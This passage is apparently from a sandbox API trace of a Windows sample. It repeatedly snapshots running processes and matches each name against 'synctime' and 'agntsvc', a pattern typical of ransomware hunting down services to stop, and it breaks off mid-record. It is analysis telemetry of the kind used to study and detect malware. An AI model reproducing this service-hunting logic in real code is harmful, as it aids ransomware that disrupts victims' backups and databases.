dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.302] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35682e0 [0093.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35682e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.302] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.302] StrStrIA (lpFirst="conhost.exe", lpSrch="synctime") returned 0x0 [0093.302] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.303] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568058 [0093.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568058, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.303] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.303] StrStrIA (lpFirst="conhost.exe", lpSrch="synctime") returned 0x0 [0093.303] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.304] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35680d0 [0093.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35680d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.304] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.304] StrStrIA (lpFirst="svchost.exe", lpSrch="synctime") returned 0x0 [0093.304] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0093.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.306] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568310 [0093.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3568310, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0093.306] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0093.306] StrStrIA (lpFirst="rxodge.exe", lpSrch="synctime") returned 0x0 [0093.306] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.307] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35682f8 [0093.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35682f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0093.307] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0093.307] StrStrIA (lpFirst="sppsvc.exe", lpSrch="synctime") returned 0x0 [0093.307] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0093.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.308] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566f70 [0093.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3566f70, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0093.308] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0093.308] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="synctime") returned 0x0 [0093.308] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0093.309] CloseHandle (hObject=0x358) returned 1 [0093.309] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0093.324] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.325] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566db0 [0093.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3566db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0093.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0093.325] StrStrIA (lpFirst="[System Process]", lpSrch="agntsvc") returned 0x0 [0093.325] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0093.326] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547918 [0093.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547918, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0093.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0093.326] StrStrIA (lpFirst="System", lpSrch="agntsvc") returned 0x0 [0093.327] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.328] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568070 [0093.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3568070, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0093.328] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0093.328] StrStrIA (lpFirst="smss.exe", lpSrch="agntsvc") returned 0x0 [0093.328] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.329] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35681a8 [0093.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35681a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.329] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.329] StrStrIA (lpFirst="csrss.exe", lpSrch="agntsvc") returned 0x0 [0093.329] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.330] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35680e8 [0093.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35680e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0093.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0093.330] StrStrIA (lpFirst="wininit.exe", lpSrch="agntsvc") returned 0x0 [0093.330] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.331] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35681c0 [0093.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35681c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.331] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.331] StrStrIA (lpFirst="csrss.exe", lpSrch="agntsvc") returned 0x0 [0093.331] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.332] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35681f0 [0093.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35681f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0093.332] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0093.332] StrStrIA (lpFirst="winlogon.exe", lpSrch="agntsvc") returned 0x0 [0093.332] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.333] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35680b8 [0093.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35680b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0093.333] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0093.333] StrStrIA (lpFirst="services.exe", lpSrch="agntsvc") returned 0x0 [0093.333] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.334] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568250 [0093.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3568250, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0093.334] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0093.334] StrStrIA (lpFirst="lsass.exe", lpSrch="agntsvc") returned 0x0 [0093.334] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.335] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568268 [0093.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568268, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.335] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.335] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.335] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.336] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568370 [0093.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568370, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.336] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.336] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="agntsvc") returned 0x0 [0093.336] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.337] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568388 [0093.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568388, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.337] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.337] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="agntsvc") returned 0x0 [0093.338] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.339] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35683a0 [0093.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35683a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.339] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.339] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.340] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479c8 [0093.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35479c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0093.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0093.340] StrStrIA (lpFirst="dwm.exe", lpSrch="agntsvc") returned 0x0 [0093.340] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.341] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35683b8 [0093.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35683b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.341] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.341] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.341] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.342] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568358 [0093.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.342] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.342] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.343] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35683d0 [0093.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35683d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.343] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.343] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 